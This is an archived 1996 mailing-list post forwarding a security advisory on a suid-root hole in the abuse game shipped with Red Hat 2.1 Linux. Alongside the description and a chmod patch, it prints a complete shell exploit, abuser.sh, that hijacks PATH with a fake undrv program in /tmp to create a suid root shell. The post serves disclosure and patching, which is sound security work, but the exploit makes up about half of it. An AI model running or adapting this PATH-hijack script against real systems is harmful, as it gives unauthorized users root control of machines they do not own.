[Prev][Next][Index]
BoS: abuse Red Hat 2.1 security hole (Just got it :))
>---------- Forwarded message ----------
>Date: Fri, 2 Feb 1996 22:28:30 -0500 (EST)
>From: David J Meltzer <davem+@andrew.cmu.edu>
>To: best-of-security@suburbia.net, bugtraq@crimelab.com,
> linux-security@tarsier.cv.nrao.edu, linux-alert@tarsier.cv.nrao.edu
>Subject: BoS: abuse Red Hat 2.1 security hole
>
> There is a security hole in Red Hat 2.1, which installs the game abuse,
>/usr/lib/games/abuse/abuse.console suid root. The abuse.console program
>loads its files without absolute pathnames, assuming the user is running
>abuse from the /usr/lib/games/abuse directory. One of these files in the
>undrv program, which abuse executes as root. If the user is not in the
>abuse directory when running this, an arbitrary program can be substituted
>for undrv, allowing the user to execute arbitrary commands as root.
> If abuse.console needs to be run by users other than root at the console,
>provisions need to be made in the code to not execute or load any files
>as root.
>
> Program: /usr/lib/games/abuse/abuse.console suid root
>Affected Operating Systems: Red Hat 2.1 linux distribution
> Requirements: account on system
> Patch: chmod -s /usr/lib/games/abuse/abuse.console
> Security Compromise: root
> Author: Dave M. (davem@cmu.edu)
> Synopsis: abuse.console runs undrv without an absolute
> pathname while executing as root, allowing
> a user to substitute the real undrv with
> an arbitrary program.
>
>Exploit:
>#!/bin/sh
>#
># abuser.sh
># exploits a security hole in abuse to create
># a suid root shell /tmp/abuser on a linux
># Red Hat 2.1 system with the games package
># installed.
>#
># by Dave M. (davem@cmu.edu)
>#
>echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
>echo ================ Checking system vulnerability
>if test -u /usr/lib/games/abuse/abuse.console
>then
>echo ++++++++++++++++ System appears vulnerable.
>cd /tmp
>cat << _EOF_ > /tmp/undrv
>#!/bin/sh
>/bin/cp /bin/sh /tmp/abuser
>/bin/chmod 4777 /tmp/abuser
>_EOF_
>chmod +x /tmp/undrv
>PATH=/tmp
>echo ================ Executing Abuse
>/usr/lib/games/abuse/abuse.console
>/bin/rm /tmp/undrv
>if test -u /tmp/abuser
>then
>echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
>else
>echo ---------------- Exploit failed
>fi
>else
>echo ---------------- This machine does not appear to be vulnerable.
>fi
>
>
> /-------------\
> |David Meltzer|
> |davem@cmu.edu|
> /--------------------------\
> |School of Computer Science|
> |Carnegie Mellon University|
> \--------------------------/
>
Ron Cohen, Tel-Aviv University Computation Center
Office 03-6407043, Home 09-663590
E-mail: rony@post.tau.ac.il
Fax: (972) 03-6409118